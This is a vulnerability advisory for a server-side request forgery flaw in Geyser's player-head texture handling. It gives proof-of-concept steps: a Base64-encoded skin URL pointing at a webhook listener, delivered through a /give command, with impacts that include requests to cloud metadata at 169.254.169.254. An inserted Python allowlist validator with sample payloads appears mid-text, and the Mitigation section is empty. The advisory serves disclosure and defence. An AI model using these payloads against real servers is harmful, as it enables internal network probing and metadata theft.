Server-side request forgery (SSRF) in org.geysermc.geyser:core

Description

Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser

Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.

When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated.
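The check that is missing here, written as an added example rather than Geyser's own code: decode the Base64 textures property, pull out textures.SKIN.url, and forward it only when it is an http(s) URL whose host is on a strict allowlist. The allowlist (textures.minecraft.net), the placeholder texture hash and the sample hosts are assumptions constructed for the example.

```python
import base64
import json
from urllib.parse import urlsplit

# Assumption: only the official Mojang texture host may be contacted.
ALLOWED_TEXTURE_HOSTS = {"textures.minecraft.net"}

def extract_texture_url(textures_value):
    """Decode the Base64 'textures' property and return textures.SKIN.url,
    or None for bad Base64, bad JSON, missing keys or a non-string url."""
    try:
        doc = json.loads(base64.b64decode(textures_value, validate=True))
    except (ValueError, TypeError):  # bad Base64, bad UTF-8 or bad JSON
        return None
    textures = doc.get("textures") if isinstance(doc, dict) else None
    skin = textures.get("SKIN") if isinstance(textures, dict) else None
    url = skin.get("url") if isinstance(skin, dict) else None
    return url if isinstance(url, str) else None

def is_allowed_texture_url(url, allowed_hosts=ALLOWED_TEXTURE_HOSTS):
    """Accept only http(s) URLs whose host is exactly on the allowlist.
    urlsplit() separates userinfo and port, so 'https://textures.minecraft.net@internal.example/'
    yields host 'internal.example' and is rejected; explicit ports are rejected too."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port  # .port raises ValueError on junk
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or parts.username is not None:
        return False
    return port is None and host in allowed_hosts

def resolve_texture_url(textures_value):
    """URL the server may fetch for this property, or None when it must be dropped."""
    url = extract_texture_url(textures_value)
    return url if url is not None and is_allowed_texture_url(url) else None

def encode_textures(url):
    """Build a 'textures' property value for a skin URL (helper for the samples)."""
    return base64.b64encode(json.dumps({"textures": {"SKIN": {"url": url}}}).encode()).decode()

# Constructed samples: an official-looking URL with a placeholder hash, the cloud metadata
# address named in the advisory, and a userinfo trick aimed at the allowlist check.
OFFICIAL = encode_textures("http://textures.minecraft.net/texture/PLACEHOLDER_HASH")
METADATA = encode_textures("http://169.254.169.254/latest/meta-data/")
USERINFO = encode_textures("https://textures.minecraft.net@internal.example/skin.png")
```

With this in place, the metadata and userinfo samples are dropped before any HTTP request is made, while the official-looking one resolves as before.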

PoC

    1. Setup Environment:
       - Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.
       - Ensure you have a Bedrock client connected.

    2. Prepare Listener:
       - Go to webhook.site and obtain a unique URL (e.g., https://webhook.site/YOUR-UUID).

    3. Construct Payload:
       - Create a JSON payload pointing to your listener URL: {"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}
       - Encode this JSON string to Base64. (You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)

    4. Execute Command:
       - Run the following command in the Bedrock Edition client: /give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]

    5. Verify:
       - Check the webhook.site dashboard.
       - You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.

Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.

Affected Parties

    Minecraft servers running Geyser

    Server operators exposing internal or cloud metadata endpoints

Potential Impacts

    Internal network probing (e.g., intranet services, admin panels)

    Cloud metadata access attempts (e.g., 169.254.169.254)

    IP address disclosure of the Minecraft server

    Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:

    Network mapping

    Firewall bypass attempts

    Cloud environment fingerprinting

Mitigation
